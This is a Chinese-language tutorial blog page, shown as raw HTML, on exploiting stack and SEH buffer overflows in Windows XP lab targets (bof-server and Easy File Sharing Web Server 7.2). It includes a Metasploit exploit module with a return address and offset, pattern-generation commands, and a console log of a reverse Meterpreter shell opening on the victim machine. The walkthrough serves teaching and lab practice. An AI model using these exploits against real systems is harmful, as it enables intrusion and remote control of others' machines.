2019-07-10 09:03:44 +00:00
<!DOCTYPE html>
< html class = "theme-next gemini use-motion" lang = "zh-Hans" >
< head > < meta name = "generator" content = "Hexo 3.8.0" >
< meta charset = "UTF-8" >
< meta http-equiv = "X-UA-Compatible" content = "IE=edge" >
< meta name = "viewport" content = "width=device-width, initial-scale=1, maximum-scale=1" >
< meta name = "theme-color" content = "#222" >
< meta http-equiv = "Cache-Control" content = "no-transform" >
< meta http-equiv = "Cache-Control" content = "no-siteapp" >
< link href = "/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel = "stylesheet" type = "text/css" >
< link href = "/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel = "stylesheet" type = "text/css" >
< link href = "/css/main.css?v=5.1.4" rel = "stylesheet" type = "text/css" >
< link rel = "apple-touch-icon" sizes = "180x180" href = "/images/hackerrank.png?v=5.1.4" >
< link rel = "icon" type = "image/png" sizes = "32x32" href = "/images/hackerrank.png?v=5.1.4" >
< link rel = "icon" type = "image/png" sizes = "16x16" href = "/images/hackerrank.png?v=5.1.4" >
< link rel = "mask-icon" href = "/images/logo.svg?v=5.1.4" color = "#222" >
< meta name = "keywords" content = "二进制,Windows,漏洞," >
2019-07-14 07:58:13 +00:00
< meta name = "description" content = "这部分是对Window x86平台下的几个典型漏洞利用方式的介绍, 从最基础的、没有开启任何保护的漏洞程序入手, 然后开启GS, 最后通过rop绕过DEP。 0x00 漏洞利用开发简介( 1) 需要什么 Immunity Debugger -Download Mona.py -Download Metasploit框架-下载 靶机– Windows XP sp3 函数调用与栈:调用、返回 寄存器与函" >
2019-07-10 09:03:44 +00:00
< meta name = "keywords" content = "二进制,Windows,漏洞" >
< meta property = "og:type" content = "article" >
< meta property = "og:title" content = "x86-basic 漏洞利用" >
< meta property = "og:url" content = "https://cool-y.github.io/2019/07/10/x86basic/index.html" >
< meta property = "og:site_name" content = "混元霹雳手" >
2019-07-14 07:58:13 +00:00
< meta property = "og:description" content = "这部分是对Window x86平台下的几个典型漏洞利用方式的介绍, 从最基础的、没有开启任何保护的漏洞程序入手, 然后开启GS, 最后通过rop绕过DEP。 0x00 漏洞利用开发简介( 1) 需要什么 Immunity Debugger -Download Mona.py -Download Metasploit框架-下载 靶机– Windows XP sp3 函数调用与栈:调用、返回 寄存器与函" >
2019-07-10 09:03:44 +00:00
< meta property = "og:locale" content = "zh-Hans" >
2019-07-26 01:02:13 +00:00
< meta property = "og:image" content = "https://res.cloudinary.com/dozyfkbg3/image/upload/v1562741903/pwn/%E6%8D%95%E8%8E%B7.png" >
< meta property = "og:image" content = "https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742079/pwn/%E6%8D%95%E8%8E%B71.png" >
< meta property = "og:image" content = "https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742316/pwn/%E5%9B%BE%E7%89%871.png" >
< meta property = "og:image" content = "https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742366/pwn/%E5%9B%BE%E7%89%872.png" >
< meta property = "og:image" content = "https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742444/pwn/%E5%9B%BE%E7%89%873.png" >
< meta property = "og:image" content = "https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742486/pwn/%E5%9B%BE%E7%89%874.png" >
< meta property = "og:image" content = "https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742543/pwn/%E5%9B%BE%E7%89%875.png" >
< meta property = "og:image" content = "https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742622/pwn/%E5%9B%BE%E7%89%876.png" >
< meta property = "og:image" content = "https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742623/pwn/%E5%9B%BE%E7%89%877.png" >
< meta property = "og:image" content = "https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742685/pwn/%E5%9B%BE%E7%89%878.png" >
< meta property = "og:image" content = "https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742686/pwn/%E5%9B%BE%E7%89%879.png" >
< meta property = "og:image" content = "https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742794/pwn/%E5%9B%BE%E7%89%8710.png" >
< meta property = "og:image" content = "https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742793/pwn/%E5%9B%BE%E7%89%8711.png" >
2019-07-10 09:03:44 +00:00
< meta property = "og:image" content = "https://res.cloudinary.com/dozyfkbg3/image/upload/v1562744120/11.png" >
2019-07-26 01:02:13 +00:00
< meta property = "og:image" content = "https://res.cloudinary.com/dozyfkbg3/image/upload/v1562744240/pwn/231.png" >
2019-07-10 09:03:44 +00:00
< meta property = "og:image" content = "https://res.cloudinary.com/dozyfkbg3/image/upload/v1562744461/%E5%9B%BE%E7%89%8712.png" >
2019-07-26 01:02:13 +00:00
< meta property = "og:image" content = "https://res.cloudinary.com/dozyfkbg3/image/upload/v1562744518/pwn/%E6%8D%9511%E8%8E%B7.png" >
< meta property = "og:updated_time" content = "2019-07-26T01:00:43.904Z" >
2019-07-10 09:03:44 +00:00
< meta name = "twitter:card" content = "summary" >
< meta name = "twitter:title" content = "x86-basic 漏洞利用" >
2019-07-14 07:58:13 +00:00
< meta name = "twitter:description" content = "这部分是对Window x86平台下的几个典型漏洞利用方式的介绍, 从最基础的、没有开启任何保护的漏洞程序入手, 然后开启GS, 最后通过rop绕过DEP。 0x00 漏洞利用开发简介( 1) 需要什么 Immunity Debugger -Download Mona.py -Download Metasploit框架-下载 靶机– Windows XP sp3 函数调用与栈:调用、返回 寄存器与函" >
2019-07-26 01:02:13 +00:00
< meta name = "twitter:image" content = "https://res.cloudinary.com/dozyfkbg3/image/upload/v1562741903/pwn/%E6%8D%95%E8%8E%B7.png" >
2019-07-10 09:03:44 +00:00
< script type = "text/javascript" id = "hexo.configurations" >
var NexT = window.NexT || {};
var CONFIG = {
root: '/',
scheme: 'Gemini',
version: '5.1.4',
sidebar: {"position":"left","display":"post","offset":12,"b2t":false,"scrollpercent":false,"onmobile":false},
fancybox: true,
tabs: true,
motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
duoshuo: {
userId: '0',
author: '博主'
},
algolia: {
applicationID: '',
apiKey: '',
indexName: '',
hits: {"per_page":10},
labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
}
};
< / script >
< link rel = "canonical" href = "https://cool-y.github.io/2019/07/10/x86basic/" >
< title > x86-basic 漏洞利用 | 混元霹雳手< / title >
< / head >
< body itemscope itemtype = "http://schema.org/WebPage" lang = "zh-Hans" >
< div class = "container sidebar-position-left page-post-detail" >
< div class = "headband" > < / div >
< header id = "header" class = "header" itemscope itemtype = "http://schema.org/WPHeader" >
< div class = "header-inner" > < div class = "site-brand-wrapper" >
< div class = "site-meta " >
< div class = "custom-logo-site-title" >
< a href = "/" class = "brand" rel = "start" >
< span class = "logo-line-before" > < i > < / i > < / span >
< span class = "site-title" > 混元霹雳手< / span >
< span class = "logo-line-after" > < i > < / i > < / span >
< / a >
< / div >
2019-07-24 03:51:42 +00:00
< p class = "site-subtitle" > < / p >
2019-07-10 09:03:44 +00:00
< / div >
< div class = "site-nav-toggle" >
< button >
< span class = "btn-bar" > < / span >
< span class = "btn-bar" > < / span >
< span class = "btn-bar" > < / span >
< / button >
< / div >
< / div >
< nav class = "site-nav" >
< ul id = "menu" class = "menu" >
< li class = "menu-item menu-item-home" >
< a href = "/" rel = "section" >
< i class = "menu-item-icon fa fa-fw fa-home" > < / i > < br >
首页
< / a >
< / li >
< li class = "menu-item menu-item-about" >
< a href = "/about/" rel = "section" >
< i class = "menu-item-icon fa fa-fw fa-user" > < / i > < br >
关于
< / a >
< / li >
< li class = "menu-item menu-item-tags" >
< a href = "/tags/" rel = "section" >
< i class = "menu-item-icon fa fa-fw fa-tags" > < / i > < br >
标签
< / a >
< / li >
< li class = "menu-item menu-item-categories" >
< a href = "/categories/" rel = "section" >
< i class = "menu-item-icon fa fa-fw fa-th" > < / i > < br >
分类
< / a >
< / li >
< li class = "menu-item menu-item-archives" >
< a href = "/archives/" rel = "section" >
< i class = "menu-item-icon fa fa-fw fa-archive" > < / i > < br >
归档
< / a >
< / li >
< li class = "menu-item menu-item-bookmarks" >
< a href = "/bookmarks/" rel = "section" >
< i class = "menu-item-icon fa fa-fw fa-map" > < / i > < br >
书签
< / a >
< / li >
2019-08-08 12:42:56 +00:00
2019-08-08 12:47:43 +00:00
< li class = "menu-item menu-item-hack之外" >
2019-08-08 12:42:56 +00:00
< a href = "/hack之外/" rel = "section" >
< i class = "menu-item-icon fa fa-fw fa-airbnb" > < / i > < br >
2019-08-08 12:47:43 +00:00
hack之外
2019-08-08 12:42:56 +00:00
< / a >
< / li >
2019-07-10 09:03:44 +00:00
< li class = "menu-item menu-item-search" >
< a href = "javascript:;" class = "popup-trigger" >
< i class = "menu-item-icon fa fa-search fa-fw" > < / i > < br >
搜索
< / a >
< / li >
< / ul >
< div class = "site-search" >
< div class = "popup search-popup local-search-popup" >
< div class = "local-search-header clearfix" >
< span class = "search-icon" >
< i class = "fa fa-search" > < / i >
< / span >
< span class = "popup-btn-close" >
< i class = "fa fa-times-circle" > < / i >
< / span >
< div class = "local-search-input-wrapper" >
< input autocomplete = "off" placeholder = "搜索..." spellcheck = "false" type = "text" id = "local-search-input" >
< / div >
< / div >
< div id = "local-search-result" > < / div >
< / div >
< / div >
< / nav >
< / div >
< / header >
< main id = "main" class = "main" >
< div class = "main-inner" >
< div class = "content-wrap" >
< div id = "content" class = "content" >
< div id = "posts" class = "posts-expand" >
< article class = "post post-type-normal" itemscope itemtype = "http://schema.org/Article" >
< div class = "post-block" >
< link itemprop = "mainEntityOfPage" href = "https://cool-y.github.io/2019/07/10/x86basic/" >
< span hidden itemprop = "author" itemscope itemtype = "http://schema.org/Person" >
< meta itemprop = "name" content = "Cool-Y" >
< meta itemprop = "description" content >
< meta itemprop = "image" content = "/images/avatar.png" >
< / span >
< span hidden itemprop = "publisher" itemscope itemtype = "http://schema.org/Organization" >
< meta itemprop = "name" content = "混元霹雳手" >
< / span >
< header class = "post-header" >
< h1 class = "post-title" itemprop = "name headline" > x86-basic 漏洞利用< / h1 >
< div class = "post-meta" >
< span class = "post-time" >
< span class = "post-meta-item-icon" >
< i class = "fa fa-calendar-o" > < / i >
< / span >
< span class = "post-meta-item-text" > 发表于< / span >
< time title = "创建于" itemprop = "dateCreated datePublished" datetime = "2019-07-10T17:00:36+08:00" >
2019-07-10
< / time >
< / span >
< span class = "post-category" >
< span class = "post-meta-divider" > |< / span >
< span class = "post-meta-item-icon" >
< i class = "fa fa-folder-o" > < / i >
< / span >
< span class = "post-meta-item-text" > 分类于< / span >
< span itemprop = "about" itemscope itemtype = "http://schema.org/Thing" >
2019-07-16 09:15:34 +00:00
< a href = "/categories/Pwn二进制漏洞/" itemprop = "url" rel = "index" >
< span itemprop = "name" > Pwn二进制漏洞< / span >
2019-07-10 09:03:44 +00:00
< / a >
< / span >
< / span >
< span id = "/2019/07/10/x86basic/" class = "leancloud_visitors" data-flag-title = "x86-basic 漏洞利用" >
< span class = "post-meta-divider" > |< / span >
< span class = "post-meta-item-icon" >
< i class = "fa fa-eye" > < / i >
< / span >
< span class = "post-meta-item-text" > 阅读次数: < / span >
< span class = "leancloud-visitors-count" > < / span >
< / span >
< div class = "post-wordcount" >
< span class = "post-meta-item-icon" >
< i class = "fa fa-file-word-o" > < / i >
< / span >
< span title = "字数统计" >
2.2k 字
< / span >
< span class = "post-meta-divider" > |< / span >
< span class = "post-meta-item-icon" >
< i class = "fa fa-clock-o" > < / i >
< / span >
< span title = "阅读时长" >
2019-07-14 07:58:13 +00:00
12 分钟
2019-07-10 09:03:44 +00:00
< / span >
< / div >
< / div >
< / header >
< div class = "post-body" itemprop = "articleBody" >
< p > 这部分是对Window x86平台下的几个典型漏洞利用方式的介绍, 从最基础的、没有开启任何保护的漏洞程序入手, 然后开启GS, 最后通过rop绕过DEP。< / p >
2019-07-14 07:58:13 +00:00
< hr >
2019-07-10 09:03:44 +00:00
< h1 id = "0x00-漏洞利用开发简介" > < a href = "#0x00-漏洞利用开发简介" class = "headerlink" title = "0x00 漏洞利用开发简介" > < / a > 0x00 漏洞利用开发简介< / h1 > < p > ( 1) 需要什么< / p >
< ul >
< li > Immunity Debugger -< a href = "http://debugger.immunityinc.com/ID_register.py" target = "_blank" rel = "noopener" > Download< / a > < / li >
< li > Mona.py -< a href = "https://github.com/corelan/mona" target = "_blank" rel = "noopener" > Download< / a > < / li >
< li > Metasploit框架-< a href = "https://www.metasploit.com/" target = "_blank" rel = "noopener" > 下载< / a > < / li >
< li > 靶机– Windows XP sp3< / li >
< / ul >
2019-07-26 01:02:13 +00:00
< p > < img src = "https://res.cloudinary.com/dozyfkbg3/image/upload/v1562741903/pwn/%E6%8D%95%E8%8E%B7.png" alt > < / p >
2019-07-10 09:03:44 +00:00
< ul >
< li > 函数调用与栈:调用、返回< / li >
< li > 寄存器与函数栈帧: ESP、EBP< / li >
< li > 函数栈帧:局部变量、栈帧状态值、函数返回地址< / li >
< li > 函数调用约定与相关指令:参数传递方式、参数入栈顺序、恢复堆栈平衡的操作< / li >
< / ul >
< p > ( 2) 函数调用的汇编过程< / p >
< ol >
< li > < p > 示例程序< / p >
< figure class = "highlight cpp" > < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < span class = "line" > 2< / span > < br > < span class = "line" > 3< / span > < br > < span class = "line" > 4< / span > < br > < span class = "line" > 5< / span > < br > < span class = "line" > 6< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > charname[] = < span class = "string" > "1234567"< / span > ;< / span > < br > < span class = "line" > voidfunc(< span class = "keyword" > int< / span > a, < span class = "keyword" > int< / span > b, < span class = "keyword" > int< / span > c)< / span > < br > < span class = "line" > { < / span > < br > < span class = "line" > charbuf[< span class = "number" > 8< / span > ];< / span > < br > < span class = "line" > < span class = "built_in" > strcpy< / span > (buf, name);< / span > < br > < span class = "line" > } < / span > < br > < / pre > < / td > < / tr > < / table > < / figure >
< / li >
< li > < p > 汇编过程< / p >
< / li >
< / ol >
< ul >
< li > PUSH c, PUSH b, PUSH a< / li >
< li > CALL address of func【保存返回地址; 跳转】< / li >
< li > MOV ebp, esp< / li >
< li > PUSH ebp< / li >
< li > SUB esp, 0x40< / li >
< li > 创建局部变量, 4个字节为一组< / li >
< li > do something< / li >
< li > add esp, 0x40< / li >
< li > pop ebp< / li >
< li > RETN【弹出返回地址, 跳转】< / li >
< / ul >
< ol start = "3" >
2019-07-26 01:02:13 +00:00
< li > 栈帧结构< br > < img src = "https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742079/pwn/%E6%8D%95%E8%8E%B71.png" alt > < / li >
2019-07-10 09:03:44 +00:00
< / ol >
< h1 id = "0x01-简单栈溢出" > < a href = "#0x01-简单栈溢出" class = "headerlink" title = "0x01 简单栈溢出" > < / a > 0x01 简单栈溢出< / h1 > < blockquote >
< p > < strong > 目标程序:< / strong > < br > < a href = "http://redstack.net/blog/static/uploads/2008/01/bof-server.c" target = "_blank" rel = "noopener" > bof-server source code< / a > < br > < a href = "http://redstack.net/blog/wp-content/uploads/2008/01/bof-server.exe" target = "_blank" rel = "noopener" > bof-server binary for Windows< / a > < br > < strong > usage:< / strong > < br > 服务端< br > < code > bof-server.exe 4242< / code > < br > 客户端< br > < code > telnet localhost 4242< / code > < br > < code > version< / code > < br > < code > bof-server v0.01< / code > < br > < code > quit< / code > < / p >
< / blockquote >
2019-07-26 01:02:13 +00:00
< h2 id = "漏洞点" > < a href = "#漏洞点" class = "headerlink" title = "漏洞点" > < / a > 漏洞点< / h2 > < p > < img src = "https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742316/pwn/%E5%9B%BE%E7%89%871.png" alt > < / p >
2019-07-14 07:58:13 +00:00
< p > < strong > 产生崩溃< / strong > < br > 将输出的1024个A发送给靶机程序< br > < figure class = "highlight plain" > < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < span class = "line" > 2< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > python -c " print(' A' * 1024)" < / span > < br > < span class = "line" > telnet 192.168.64.138 4242< / span > < br > < / pre > < / td > < / tr > < / table > < / figure > < / p >
2019-07-26 01:02:13 +00:00
< p > < img src = "https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742366/pwn/%E5%9B%BE%E7%89%872.png" alt > < / p >
2019-07-10 09:03:44 +00:00
< h2 id = "关闭防御措施" > < a href = "#关闭防御措施" class = "headerlink" title = "关闭防御措施" > < / a > 关闭防御措施< / h2 > < p > 使用< strong > PESecurity< / strong > 检查可执行文件本身的防御措施开启情况< br > 注意设置: Set-ExecutionPolicyUnrestricted< / p >
2019-07-26 01:02:13 +00:00
< p > < img src = "https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742444/pwn/%E5%9B%BE%E7%89%873.png" alt > < / p >
< p > < strong > ASLR和DEP< / strong > < br > ASLR在xp下不用考虑, DEP可通过修改boot.ini中的nonexecute来完成( AlwaysOff、OptOut) < br > < img src = "https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742486/pwn/%E5%9B%BE%E7%89%874.png" alt > < / p >
2019-07-14 07:58:13 +00:00
< h2 id = "整体的攻击流程" > < a href = "#整体的攻击流程" class = "headerlink" title = "整体的攻击流程" > < / a > 整体的攻击流程< / h2 > < ol >
2019-07-10 09:03:44 +00:00
< li > 任意非00的指令覆盖buffer和EBP< / li >
< li > 从程序已经加载的dll中获取他们的jmp esp指令地址。< / li >
< li > 使用jmp esp的指令地址覆盖ReturnAddress< / li >
2019-07-26 01:02:13 +00:00
< li > 从下一行开始填充Shellcode< br > < img src = "https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742543/pwn/%E5%9B%BE%E7%89%875.png" alt > < / li >
2019-07-10 09:03:44 +00:00
< / ol >
< h2 id = "确定溢出点的位置" > < a href = "#确定溢出点的位置" class = "headerlink" title = "确定溢出点的位置" > < / a > 确定溢出点的位置< / h2 > < ol >
2019-07-26 01:02:13 +00:00
< li > < p > 生成字符序列 < strong > pattern_create.rb< / strong > < br > < img src = "https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742622/pwn/%E5%9B%BE%E7%89%876.png" alt > < / p >
2019-07-10 09:03:44 +00:00
< / li >
2019-07-26 01:02:13 +00:00
< li > < p > 发送给目标程序< br > < img src = "https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742623/pwn/%E5%9B%BE%E7%89%877.png" alt > < / p >
2019-07-10 09:03:44 +00:00
< / li >
2019-07-26 01:02:13 +00:00
< li > < p > 计算偏移量 < strong > pattern_offset.rb< / strong > < br > < img src = "https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742685/pwn/%E5%9B%BE%E7%89%878.png" alt > < / p >
2019-07-10 09:03:44 +00:00
< / li >
2019-07-26 01:02:13 +00:00
< li > < p > 确定payload结构< br > < img src = "https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742686/pwn/%E5%9B%BE%E7%89%879.png" alt > < / p >
2019-07-10 09:03:44 +00:00
< / li >
< / ol >
< h2 id = "寻找jmp-esp跳板" > < a href = "#寻找jmp-esp跳板" class = "headerlink" title = "寻找jmp esp跳板" > < / a > 寻找jmp esp跳板< / h2 > < ol >
2019-07-26 01:02:13 +00:00
< li > OD附加进程看一下服务器加载了哪些模块< br > < img src = "https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742794/pwn/%E5%9B%BE%E7%89%8710.png" alt > < / li >
< li > 查找JMP ESP指令的地址< br > 在这里选择了ws2_32.dll作为对象, 通过Metasploit的msfbinscan进行搜索< br > < img src = "https://res.cloudinary.com/dozyfkbg3/image/upload/v1562742793/pwn/%E5%9B%BE%E7%89%8711.png" alt > < / li >
2019-07-10 09:03:44 +00:00
< / ol >
< h2 id = "自动化攻击" > < a href = "#自动化攻击" class = "headerlink" title = "自动化攻击" > < / a > 自动化攻击< / h2 > < figure class = "highlight ruby" > < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < span class = "line" > 2< / span > < br > < span class = "line" > 3< / span > < br > < span class = "line" > 4< / span > < br > < span class = "line" > 5< / span > < br > < span class = "line" > 6< / span > < br > < span class = "line" > 7< / span > < br > < span class = "line" > 8< / span > < br > < span class = "line" > 9< / span > < br > < span class = "line" > 10< / span > < br > < span class = "line" > 11< / span > < br > < span class = "line" > 12< / span > < br > < span class = "line" > 13< / span > < br > < span class = "line" > 14< / span > < br > < span class = "line" > 15< / span > < br > < span class = "line" > 16< / span > < br > < span class = "line" > 17< / span > < br > < span class = "line" > 18< / span > < br > < span class = "line" > 19< / span > < br > < span class = "line" > 20< / span > < br > < span class = "line" > 21< / span > < br > < span class = "line" > 22< / span > < br > < span class = "line" > 23< / span > < br > < span class = "line" > 24< / span > < br > < span class = "line" > 25< / span > < br > < span class = "line" > 26< / span > < br > < span class = "line" > 27< / span > < br > < span class = "line" > 28< / span > < br > < span class = "line" > 29< / span > < br > < span class = "line" > 30< / span > < br > < span class = "line" > 31< / span > < br > < span class = "line" > 32< / span > < br > < span class = "line" > 33< / span > < br > < span class = "line" > 34< / span > < br > < span class = "line" > 35< / span > < br > < span class = "line" > 36< / span > < br > < span class = "line" > 37< / span > < br > < span class = "line" > 38< / span > < br > < span class = "line" > 39< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > < span class = "keyword" > require< / span > < span class = "string" > 'msf/core'< / span > < / span > < br > < span class = "line" > < span class = "class" > < span class = "keyword" > class< / span > < span class = "title" > Metasploit3< / span > < Msf::Exploit::< span class = "title" > Remote< / span > < / span > < / span > < br > < span class = "line" > Rank = NormalRanking< / span > < br > < span class = "line" > < span class = "keyword" > include< / span > Msf::Exploit::Remote::Tcp< / span > < br > < span class = "line" > < / span > < br > < span class = "line" > < span class = "function" > < span class = "keyword" > def< / span > < span class = "title" > initialize< / span > < span class = "params" > (info = { } )< / span > < / span > < / span > < br > < span class = "line" > < span class = "keyword" > super< / span > (update_info(info,< / span > < br > < span class = "line" > < span class = "string" > 'Name'< / span > => < span class = "string" > 'Stack Based Buffer Overflow Example'< / span > ,< / span > < br > < span class = "line" > < span class = "string" > 'Description'< / span > => < span class = "string" > %q{ < / span > < / span > < br > < span class = "line" > < span class = "string" > Stack Based Overflow Example Application Exploitation Module< / span > < / span > < br > < span class = "line" > < span class = "string" > } < / span > ,< / span > < br > < span class = "line" > < span class = "string" > 'Platform'< / span > => < span class = "string" > 'Windows'< / span > ,< / span > < br > < span class = "line" > < span class = "string" > 'Author'< / span > => < span class = "string" > 'yanhan'< / span > ,< / span > < br > < span class = "line" > < / span > < br > < span class = "line" > < span class = "string" > 'Payload'< / span > => < / span > < br > < span class = "line" > { < / span > < br > < span class = "line" > < span class = "string" > 'space'< / span > => < span class = "number" > 400< / span > ,< / span > < br > < span class = "line" > < span class = "string" > 'BadChars'< / span > => < span class = "string" > "\x00\xff"< / span > < / span > < br > < span class = "line" > } ,< / span > < br > < span class = "line" > < span class = "string" > 'Targets'< / span > => < / span > < br > < span class = "line" > [< / span > < br > < span class = "line" > [< / span > < br > < span class = "line" > < span class = "string" > 'Windows XP SP3'< / span > ,< / span > < br > < span class = "line" > { < span class = "string" > 'Ret'< / span > => < span class = "number" > 0x71a22b53< / span > , < span class = "string" > 'Offset'< / span > => < span class = "number" > 520< / span > } < / span > < br > < span class = "line" > ]< / span > < br > < span class = "line" > ],< / span > < br > < span class = "line" > < span class = "string" > 'DisclosureDate'< / span > => < span class = "string" > '2019-05-25'< / span > < / span > < br > < span class = "line" > ))< / span > < br > < span class = "line" > < span c
2019-07-14 07:58:13 +00:00
< figure class = "highlight plain" > < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < span class = "line" > 2< / span > < br > < span class = "line" > 3< / span > < br > < span class = "line" > 4< / span > < br > < span class = "line" > 5< / span > < br > < span class = "line" > 6< / span > < br > < span class = "line" > 7< / span > < br > < span class = "line" > 8< / span > < br > < span class = "line" > 9< / span > < br > < span class = "line" > 10< / span > < br > < span class = "line" > 11< / span > < br > < span class = "line" > 12< / span > < br > < span class = "line" > 13< / span > < br > < span class = "line" > 14< / span > < br > < span class = "line" > 15< / span > < br > < span class = "line" > 16< / span > < br > < span class = "line" > 17< / span > < br > < span class = "line" > 18< / span > < br > < span class = "line" > 19< / span > < br > < span class = "line" > 20< / span > < br > < span class = "line" > 21< / span > < br > < span class = "line" > 22< / span > < br > < span class = "line" > 23< / span > < br > < span class = "line" > 24< / span > < br > < span class = "line" > 25< / span > < br > < span class = "line" > 26< / span > < br > < span class = "line" > 27< / span > < br > < span class = "line" > 28< / span > < br > < span class = "line" > 29< / span > < br > < span class = "line" > 30< / span > < br > < span class = "line" > 31< / span > < br > < span class = "line" > 32< / span > < br > < span class = "line" > 33< / span > < br > < span class = "line" > 34< / span > < br > < span class = "line" > 35< / span > < br > < span class = "line" > 36< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > msf5 > use exploit/windows/yanhan/bof_attack< / span > < br > < span class = "line" > msf5 exploit(windows/yanhan/bof_attack) > set rhosts 192.168.31.114< / span > < br > < span class = "line" > rhosts => 192.168.31.114< / span > < br > < span class = "line" > msf5 exploit(windows/yanhan/bof_attack) > set rport 1000< / span > < br > < span class = "line" > rport => 1000< / span > < br > < span class = "line" > msf5 exploit(windows/yanhan/bof_attack) > exploit< / span > < br > < span class = "line" > < / span > < br > < span class = "line" > [*] Started reverse TCP handler on 192.168.31.84:4444< / span > < br > < span class = "line" > [*] Sending stage (179779 bytes) to 192.168.31.114< / span > < br > < span class = "line" > [*] Meterpreter session 1 opened (192.168.31.84:4444 -> 192.168.31.114:1062) at 2019-07-10 16:38:51 +0800< / span > < br > < span class = "line" > < / span > < br > < span class = "line" > meterpreter > ls< / span > < br > < span class = "line" > Listing: C:\Documents and Settings\Administrator< / span > < br > < span class = "line" > ================================================< / span > < br > < span class = "line" > < / span > < br > < span class = "line" > Mode Size Type Last modified Name< / span > < br > < span class = "line" > ---- ---- ---- ------------- ----< / span > < br > < span class = "line" > 40555/r-xr-xr-x 0 dir 2019-05-14 09:54:43 +0800 Application Data< / span > < br > < span class = "line" > 40777/rwxrwxrwx 0 dir 2019-05-14 09:54:43 +0800 Cookies< / span > < br > < span class = "line" > 40555/r-xr-xr-x 0 dir 2019-05-14 09:54:43 +0800 Favorites< / span > < br > < span class = "line" > 40777/rwxrwxrwx 0 dir 2019-05-14 09:54:43 +0800 Local Settings< / span > < br > < span class = "line" > 40555/r-xr-xr-x 0 dir 2019-05-14 09:54:43 +0800 My Documents< / span > < br > < span class = "line" > 100666/rw-rw-rw- 1048576 fil 2019-05-14 09:54:43 +0800 NTUSER.DAT< / span > < br > < span class = "line" > 40777/rwxrwxrwx 0 dir 2019-05-14 09:54:43 +0800 NetHood< / span > < br > < span class = "line" > 40777/rwxrwxrwx 0 dir 2019-05-14 09:54:43 +0800 PrintHood< / span > < br > < span class = "line" > 40555/r-xr-xr-x 0 dir 2019-05-14 09:54:43 +0800 Recent< / span > < br > < span class = "line" > 40555/r-xr-xr-x 0 dir 2019-05-14 09:54:43 +0800 SendTo< / span > < br > < span class = "line" > 40777/rwxrwxrwx 0 dir 2019-05-14 09:54:43 +0800 Templates< / span > < br > < span class = "line" > 100777/rwxrwxrwx 26665 fil 2019-05-28 14:59:10 +0800 bof-server.exe< / span > < br > < span class = "line" > 100666/rw-rw-rw- 1024 fil 2019-05-14 09:54:43 +0800 ntuser.dat.LOG< / span > < br > < span class = "line" > 100666/rw-rw-rw- 178 fil 2019-05-14 09:54:43 +0800 ntuser.ini< / span > < br > < span class = "line" > 40777/rwxrwxrwx 0 dir 2019-05-29 10:49:26 +0800 vulnserver< / span > < br > < span class = "line" > 40555/r-xr-xr-x 0 dir 2019-05-14 09:54:43 +0800 「开始」菜单< / span > < br > < span
< hr >
2019-07-10 09:03:44 +00:00
< h1 id = "0x02-基于SEH的栈溢出" > < a href = "#0x02-基于SEH的栈溢出" class = "headerlink" title = "0x02 基于SEH的栈溢出" > < / a > 0x02 基于SEH的栈溢出< / h1 > < blockquote >
< p > < strong > 目标程序< / strong > Easy File Sharing Web Server 7.2< / p >
< p > < strong > 漏洞点< / strong > < br > 在处理请求时存在漏洞——一个恶意的请求头部( HEAD或GET) 就可以引起缓冲区溢出, 从而改写SEH链的地址。< / p >
< p > < strong > 利用seh< / strong > < br > 填充物+nseh+ seh( pop popretn指令序列地址) +shellcode< / p >
< p > < img src = "https://res.cloudinary.com/dozyfkbg3/image/upload/v1562744120/11.png" alt > < / p >
< / blockquote >
< h2 id = "确定溢出点的位置-1" > < a href = "#确定溢出点的位置-1" class = "headerlink" title = "确定溢出点的位置" > < / a > 确定溢出点的位置< / h2 > < ol >
2019-07-14 07:58:13 +00:00
< li > 生成字符序列< figure class = "highlight plain" > < table > < tr > < td class = "gutter" > < pre > < span class = "line" > 1< / span > < br > < span class = "line" > 2< / span > < br > < span class = "line" > 3< / span > < br > < / pre > < / td > < td class = "code" > < pre > < span class = "line" > /opt/metasploit-framework/embedded/framework/tools/exploit/pattern_create.rb -l 10000 > a.txt< / span > < br > < span class = "line" > python -c " print(' HTTP/1.0\r\n\r\n' )" > b.txt< / span > < br > < span class = "line" > cat a.txt b.txt > c.txt< / span > < br > < / pre > < / td > < / tr > < / table > < / figure >
2019-07-10 09:03:44 +00:00
< / li >
< / ol >
2019-07-14 07:58:13 +00:00
